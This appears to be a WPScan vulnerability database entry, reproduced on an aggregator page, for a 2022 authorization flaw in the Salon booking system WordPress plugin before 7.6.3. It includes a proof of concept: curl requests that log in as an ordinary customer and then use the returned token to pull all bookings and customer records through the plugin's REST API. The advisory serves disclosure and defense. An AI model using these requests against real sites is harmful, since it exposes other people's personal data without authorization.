Lucene search

K

Huli from CymetricsWPVDB-ID:5A5AB7A8-BE67-4F70-925C-9CB1EFF2FBE0

HistoryMar 21, 2022 - 12:00 a.m.

Salon booking system < 7.6.3 - Customer+ Bookings/Customers Data Disclosure

2022-03-2100:00:00

Huli from Cymetrics

wpscan.com

16

salon booking system

customer data disclosure

authorization issue.

EPSS

0.002

Percentile

58.7%

The plugin does not have proper authorisation in some of its endpoints, which could allow customers to access all bookings and other customer’s data

PoC

Make a booking to get a customer account Login via API and get access token: curl “https://example.com/?rest_route=/salon/api/v1/login&name;[email protected]&password;=11111111” response: {“status”:“OK”,“access_token”:“5ad1d8d73d058958e98987bec31a12d25c14b9ba”} Send requests to get all bookings/customers data using the access token curl “http://example.com/?rest_route=/salon/api/v1/bookings/” -H “Access-Token:5ad1d8d73d058958e98987bec31a12d25c14b9ba” curl “http://example.com/?rest_route=/salon/api/v1/customers/” -H “Access-Token:5ad1d8d73d058958e98987bec31a12d25c14b9ba”

EPSS

0.002

Percentile

58.7%

Related for WPVDB-ID:5A5AB7A8-BE67-4F70-925C-9CB1EFF2FBE0

patchstack2 wpexploit1 cvelist1 cve1 prion1 nvd1